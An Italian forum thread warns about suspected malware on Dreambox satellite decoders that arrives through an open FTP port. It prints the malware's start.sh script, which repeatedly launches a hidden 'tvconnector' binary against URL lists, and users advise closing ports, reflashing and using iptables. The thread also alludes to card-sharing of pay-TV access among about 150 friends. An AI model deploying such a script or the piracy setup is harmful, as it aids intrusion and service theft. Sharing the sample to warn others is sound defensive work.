| Autore |
Messaggio
|
| marte_57 |
 Inviato: Dom Gen 28, 2007 3:09 pm Oggetto: Porte Dre4mb0x (era: @Ricky..) |
 |
|
BANNATO
Registrato: 21/01/07 11:12
Età: 54
Messaggi: 3968
|
ti faccio un copia incolla di una notizia postata sul mio forum da un amico...
| Citazione: | sembra che ci sia un qualcosa che entra nel dream tramite la porta 21, una volta nel dream si propaga da 1 a persona 100, poi a 10000 e cosi via..
sembra che sia un fil* di nome tarfile 4347_tool2.tar in /var..
questo si sviluppa in /var/tool2 con uno script start.sh che ha sua volta è collegato ad un altro fil* bin di nome tvconnector..
controllate i vostri dream e se trovate qualcosa del genere flashate il dec..........
questo è lo script che viene lanciato da questa applicazione:
IFS='
'
while :;
do
for i in `cat browsers`;do
cp settings blap
echo "user-agent = $i" >> blap
URLS=`cat urls1.txt |awk -F "/" '{print $3}'|sort|uniq`
IP=`for i in $URLS;do nslookup $i;done|tail -1|awk '{print $2'}`
if [ "$IP" != "127.0.0.1" ];then
cp urls1.txt urls.txt
./tvconnector -R blap > /dev/null 2>&1 &
fi
URLS=`cat urls2.txt |awk -F "/" '{print $3}'|sort|uniq`
IP=`for i in $URLS;do nslookup $i;done|tail -1|awk '{print $2'}`
if [ "$IP" != "127.0.0.1" ];then
cp urls2.txt urls.txt
./tvconnector -R blap > /dev/null 2>&1 &
fi
URLS=`cat urls3.txt |awk -F "/" '{print $3}'|sort|uniq`
IP=`for i in $URLS;do nslookup $i;done|tail -1|awk '{print $2'}`
if [ "$IP" != "127.0.0.1" ];then
cp urls3.txt urls.txt
./tvconnector -R blap > /dev/null 2>&1 &
fi
URLS=`cat urls4.txt |awk -F "/" '{print $3}'|sort|uniq`
IP=`for i in $URLS;do nslookup $i;done|tail -1|awk '{print $2'}`
if [ "$IP" != "127.0.0.1" ];then
cp urls4.txt urls.txt
./tvconnector -R blap > /dev/null 2>&1 &
fi
URLS=`cat urls5.txt |awk -F "/" '{print $3}'|sort|uniq`
IP=`for i in $URLS;do nslookup $i;done|tail -1|awk '{print $2'}`
if [ "$IP" != "127.0.0.1" ];then
cp urls5.txt urls.txt
./tvconnector -R blap > /dev/null 2>&1 &
fi
URLS=`cat urls6.txt |awk -F "/" '{print $3}'|sort|uniq`
IP=`for i in $URLS;do nslookup $i;done|tail -1|awk '{print $2'}`
if [ "$IP" != "127.0.0.1" ];then
cp urls6.txt urls.txt
./tvconnector -R blap > /dev/null 2>&1 &
fi
URLS=`cat urls6.txt |awk -F "/" '{print $3}'|sort|uniq`
IP=`for i in $URLS;do nslookup $i;done|tail -1|awk '{print $2'}`
if [ "$IP" != "127.0.0.1" ];then
cp urls6.txt urls.txt
./tvconnector -R blap > /dev/null 2>&1 &
fi
URLS=`cat urls7.txt |awk -F "/" '{print $3}'|sort|uniq`
IP=`for i in $URLS;do nslookup $i;done|tail -1|awk '{print $2'}`
if [ "$IP" != "127.0.0.1" ];then
cp urls7.txt urls.txt
./tvconnector -R blap > /dev/null 2>&1 &
fi
done
sleep 300
killall tvconnector
done |
Ora....a parte tutte queste cose arabe scritte io avrei la necessita di chiudere alcune porte al mio decoder(23-21-80) che pero nn passa dal pc ma e' direttamente attaccato allo switch e quindi all'aggeggio sul tetto... 
come potrei fare???? tu da remoto lo puoi fare??
grazie per la risposta
ps l'ìp del deco e' finale 28
_________________
LEGGETE IL REGOLAMENTO
Stretta la Foglia
Larga la Via...
www.meteoborso.altervista.org
http://62.149.166.243/mappe/GoogleMaps.php
DEDICATO A TUTTI I "BLABLABLA"
  |
|
| Top |
|
 |
Sponsor
|
|
 |
| Trew |
| Inviato: Dom Gen 28, 2007 3:59 pm Oggetto: |
|
|
SUPER MOD
Registrato: 06/01/07 17:00
Età: 26
Messaggi: 3867
|
il dream è il decoder giusto?
che decoder è e perchè lo tieni collegato alla lan?
_________________
5GHz goes through air.
2.4GHz goes through one tree.
900MHz goes through two trees.
Chainsaws go through +3 trees. |
|
| Top |
|
|
| TocaiRosso |
| Inviato: Dom Gen 28, 2007 4:00 pm Oggetto: |
|
|
BANNATO
Registrato: 06/01/07 18:12
Età: 27
Messaggi: 1303
|
| Che roba è sto dream?E il decoder?Di che decoder stai parlando? |
|
| Top |
|
|
| Trew |
| Inviato: Dom Gen 28, 2007 4:02 pm Oggetto: |
|
|
SUPER MOD
Registrato: 06/01/07 17:00
Età: 26
Messaggi: 3867
|
copia e incolla tocai
_________________
5GHz goes through air.
2.4GHz goes through one tree.
900MHz goes through two trees.
Chainsaws go through +3 trees. |
|
| Top |
|
|
| andretta |
| Inviato: Dom Gen 28, 2007 5:22 pm Oggetto: |
|
|
Registrato: 06/01/07 18:58
Messaggi: 698
|
|
| Top |
|
|
| marte_57 |
| Inviato: Dom Gen 28, 2007 5:37 pm Oggetto: |
|
|
BANNATO
Registrato: 21/01/07 11:12
Età: 54
Messaggi: 3968
|
e certo che e' un dream.....
cosa lo tengo a fare on line???
ihihh un po di immaginazione....vediamo se lo scopri 
poi altrimenti in pm magari te lo dico...
e sempre per lo stesso motivo nn posso dargli un ip diverso...o meglio nn servirebbe a nulla in quanto se nn usi IP fisso devi usare no-ip oppure dyndns e a quel punto le noie diventano le medesime
_________________
LEGGETE IL REGOLAMENTO
Stretta la Foglia
Larga la Via...
www.meteoborso.altervista.org
http://62.149.166.243/mappe/GoogleMaps.php
DEDICATO A TUTTI I "BLABLABLA"
|
|
| Top |
|
|
| Trew |
| Inviato: Dom Gen 28, 2007 5:40 pm Oggetto: |
|
|
SUPER MOD
Registrato: 06/01/07 17:00
Età: 26
Messaggi: 3867
|
_________________
5GHz goes through air.
2.4GHz goes through one tree.
900MHz goes through two trees.
Chainsaws go through +3 trees. |
|
| Top |
|
|
| marte_57 |
| Inviato: Dom Gen 28, 2007 5:49 pm Oggetto: |
|
|
BANNATO
Registrato: 21/01/07 11:12
Età: 54
Messaggi: 3968
|
|
| Top |
|
|
| karyal |
| Inviato: Dom Gen 28, 2007 6:42 pm Oggetto: Re: @ Ricky... |
|
|
2° avvertimento
Registrato: 06/01/07 22:24
Età: 35
Messaggi: 6961
|
| marte_57 ha scritto: | ti faccio un copia incolla di una notizia postata sul mio forum da un amico...
|
Interessante, da l'idea di essere uno script che lancia ad intervalli regolari (5 minuti) un programmino (tvconnector) che fa qualcosa, sulla base di una lista di ip che memorizza sul decoder (probabilmente una lista di quegli ip che si sono connessi al decoder stesso).
| marte_57 ha scritto: |
Ora....a parte tutte queste cose arabe scritte io avrei la necessita di chiudere alcune porte al mio decoder(23-21-80) che pero nn passa dal pc ma e' direttamente attaccato allo switch e quindi all'aggeggio sul tetto...
come potrei fare???? tu da remoto lo puoi fare??
grazie per la risposta
ps l'ìp del deco e' finale 28 |
Si posso farlo, ma credo che impedirebbe al decoder di fare quello che deve fare... se le porte in oggetto sono aperte sul decoder significa che il decoder le usa.. se le chiudi non le usa piu' e non va... la soluzione, come per quasi tutti gli exploit non e' staccare la spina  ma aggiornare il software/firmware in modo da chiudere la vulnerabilita'.. io se vuoi ti blocco le porte, ma secondo me a parte renderti inutilizzabile il dreambox non serve a nulla.
Ciao,
Ricky |
|
| Top |
|
|
| Trew |
| Inviato: Dom Gen 28, 2007 7:47 pm Oggetto: |
|
|
SUPER MOD
Registrato: 06/01/07 17:00
Età: 26
Messaggi: 3867
|
bastava dirlo che era il DreamBOX!!
_________________
5GHz goes through air.
2.4GHz goes through one tree.
900MHz goes through two trees.
Chainsaws go through +3 trees. |
|
| Top |
|
|
| marte_57 |
| Inviato: Dom Gen 28, 2007 7:53 pm Oggetto: |
|
|
BANNATO
Registrato: 21/01/07 11:12
Età: 54
Messaggi: 3968
|
ciao Ricky....
no nn e' cosi....in effetti le porte atte allo scambio degli ecm e degli emm necessari alla visione sono altre
la porta 80 per esempio si usa per attivarel'interfaccia web che ti permette di eseguire alcuni operazioni dal browser, tipo cambiare i canali oppure visualizzare sul pc quello che sta andando in tv....tramite un plugin di vlc...
la 21 server per entrare via ftp nel sistema cosi da poter aggiungere o levare servizi, editare file di linux con crimson editor ecc ecc, mentre la 23 server per entrare da telnet e per chi conosce bene linux, far fare i numeri a sto gioiellino....quindi se mi chiudi quelle porte dall'esterno io comunuqe da lan ci entro lo stesso e potrei tenere distante i rompiscatole....inoltre penso che se ci fosse l'eventalita di far entrare qualke amico per lavori staordinari, lo possa fare comunque entrando dalla 23 del pc e poi da li dentro al dec....certo che se ci fosse la possibilita di mettere tutto dietro ad un router male nn sarebbe....anche se in effetti io un router lo sto usando ed e' il netgear wgr826v...ma ha solo 3 porte e nn ho molta voglia di diventare deficente per riconfigurare tutto.
Sarei infatti costretto a modificare i file in cui c'e scritto l'ip del mio dream, sia da me che da circa 150 amici con i quali condividiamo tutto l'arcano....e' un casotto....gia' l'ho fatto quando mi hai dati gli ip fissi e ti asssicura che ci ho perso due giorni pieni...
anche perche son de coccio!!!
comuque ho appena sentito l'amico GURU di linux...e mi ha detto che sul dream posso mettere iptables cosi da fare tutto quello che voglio con le porte ....
eventualmente ci fossero problemi con sto plugin , Ricky ti chiedero' di chiudere le porte...
gracias
_________________
LEGGETE IL REGOLAMENTO
Stretta la Foglia
Larga la Via...
www.meteoborso.altervista.org
http://62.149.166.243/mappe/GoogleMaps.php
DEDICATO A TUTTI I "BLABLABLA"
|
|
| Top |
|
|
| lrdbiron |
| Inviato: Dom Gen 28, 2007 8:00 pm Oggetto: |
|
|
Registrato: 10/01/07 22:02
Età: 46
Messaggi: 982
Residenza: Gambellara (VI)
|
da un forum abb. valido
è uno "spyware" che qualcuno mette in giro cercando di carpire info sui peers ed i collegamenti "in rete" che uno puo' avere in atto...questo avviene secondo l'autore del 3ad quando tra le cartelle del DB viene installato il file"4347_tool2.tar" in /var e crea a sua volta la sottocartella in var/tool2 con uno script nominato "start.sh" che usa a sua volta il file bin "tv connector" sempre "secondo" l'autore del 3ad....
come essere sicuri di non avere questo"problemino"? sincerarsi andando a fare un check-in delle cartelle indicate per vedere se per caso sono state create queste "folder" all'interno dell'img. la /var è indispensabile per il funzionamento dell'img. in Db le altre se vengono accertate cancellarle "al volo" e poi se fosse cambierei anche per sicurezza dopo la passwd con telnet in modo che non sia possibile " rientrare dalla finestra dopo essere stati sbattuti fuori dalla porta..." enjoy ed in bocca al lupo
se vuoi kuella in eng. altro forum valido.
SPYWHARE ONBOARD? VIRUS IN LINUX DREAMBOX ?? CHECK YOURE BOX
something is hacking the dreambox when you have port 21 open
how they find you i dont know maybe because of 1 cw that leads to 100 others and that leads to 100.000 others and so on
when they have hacked you then they uploaded a tarfile 4347_tool2.tar in /var and unpack it in /var/tool2 and then run a script start.sh in /var/tool2 which uses a binary called tvconnector.
who thes people are i dont know what this does i dont know
i do know that it should not be in youre dreambox
this could easy be spyware from who knows
my advise is to you all check youre dreambox id you see one of thes files/dir's in youre box
FLASH IT
dont take any risk maybe youre box is sending data about youre peers
maybe youre box is sending data to collect as evidence against you
TO ALL CHECK YOUR BOXES AND CLOSE FTP PORT FOR THE EXTERNE NETWORK
THIS INFORMATION IS FROM A VERY TRUSTED PPL |
|
| Top |
|
|
| marte_57 |
| Inviato: Dom Gen 28, 2007 8:49 pm Oggetto: |
|
|
BANNATO
Registrato: 21/01/07 11:12
Età: 54
Messaggi: 3968
|
|
| Top |
|
|
| karyal |
| Inviato: Dom Gen 28, 2007 9:11 pm Oggetto: |
|
|
2° avvertimento
Registrato: 06/01/07 22:24
Età: 35
Messaggi: 6961
|
| marte_57 ha scritto: | ciao Ricky....
no nn e' cosi....in effetti le porte atte allo scambio degli ecm e degli emm necessari alla visione sono altre
|
ok, chiudo... |
|
| Top |
|
|
| Trew |
| Inviato: Dom Gen 28, 2007 9:13 pm Oggetto: |
|
|
SUPER MOD
Registrato: 06/01/07 17:00
Età: 26
Messaggi: 3867
|
Ricky è un hacker
_________________
5GHz goes through air.
2.4GHz goes through one tree.
900MHz goes through two trees.
Chainsaws go through +3 trees. |
|
| Top |
|
|
|
|
REGOLAMENTO
